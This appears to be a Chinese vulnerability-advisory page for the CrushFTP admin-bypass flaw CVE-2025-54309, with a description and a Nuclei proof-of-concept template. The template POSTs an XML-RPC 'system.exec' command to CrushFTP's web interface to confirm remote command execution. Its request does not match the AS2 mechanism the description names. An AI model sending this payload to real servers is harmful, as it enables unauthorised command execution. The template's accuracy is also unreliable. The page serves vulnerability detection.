CrushFTP - Unprotected Alternate Channel

漏洞信息

漏洞名称: CrushFTP - Unprotected Alternate Channel

漏洞编号:

  • CVE: CVE-2025-54309

漏洞类型: 权限绕过

漏洞等级: 严重

漏洞描述: CrushFTP是一款广泛使用的文件传输服务器软件,支持多种协议如FTP、SFTP、HTTP等,常用于企业环境中进行文件共享和传输。该软件因其功能强大和易于部署而受到许多组织的青睐。此次发现的漏洞涉及CrushFTP在未使用DMZ代理功能时,对AS2验证的处理不当,导致攻击者可以通过HTTPS协议远程获取管理员权限。这一漏洞的技术根源在于软件未能正确验证来自未受保护替代通道的请求,从而允许攻击者绕过正常的身份验证流程。由于攻击者可以利用此漏洞获得管理员权限,这意味着他们可以完全控制受影响的CrushFTP服务器,执行任意命令、访问敏感数据或进行其他恶意操作。此漏洞的利用不需要用户交互,且已被发现在2025年7月被实际利用,因此对使用受影响版本CrushFTP的组织构成了严重的安全威胁。

产品厂商: crushftp

产品名称: CrushFTP

影响版本: 10 before 10.8.5 and 11 before 11.3.4_23

搜索语法: title:”CrushFTP”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/44413668c914b88b2017af296f1c21e6c8366ae8/http%2Fcves%2F2025%2FCVE-2025-54309.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68

id: CVE-2025-54309

info:
  name: CrushFTP - Unprotected Alternate Channel
  author: anshubind
  severity: critical
  description: |
    CrushFTP 10 before 10.8.5 and 11 before 11.3.4_23, when the DMZ proxy feature is not used, mishandles AS2 validation and consequently allows remote attackers to obtain admin access via HTTPS, as exploited in the wild in July 2025.
  impact: |
    Remote attackers can gain administrative access, leading to full control over the CrushFTP server.
  remediation: |
    Update to version 10.8.5, 11.3.4_23 or later.
  reference:
    - https://www.crushftp.com/crush11wiki/Wiki.jsp?page=CompromiseJuly2025
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54309
    - https://github.com/advisories/GHSA-rh5q-v9ww-rqgm
    - https://github.com/issamjr/CVE-2025-54309-EXPLOIT
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.0
    cve-id: CVE-2025-54309
    cwe-id: CWE-420
    epss-score: 0.07464
    epss-percentile: 0.91328
    cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: crushftp
    product: crushftp
    shodan-query: title:"CrushFTP"
  tags: cve,cve2025,crushftp,rce

variables:
  cmd: "id"

http:
  - method: POST
    path:
      - "{{BaseURL}}/WebInterface/function/"
    
    headers:
      Content-Type: application/xml
    
    body: |
      <?xml version="1.0"?>
      <methodCall>
        <methodName>system.exec</methodName>
        <params>
          <param>
            <value>
              <string>{{cmd}}</string>
            </value>
          </param>
        </params>
      </methodCall>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "uid="
      - type: status
        status:
          - 200

Github Poc
#projectdiscovery/nuclei-templates:github issues #权限绕过
CrushFTP - Unprotected Alternate Channel
http://example.com/2025/07/29/github_4037175452/
作者
lianccc
发布于
2025年7月29日
许可协议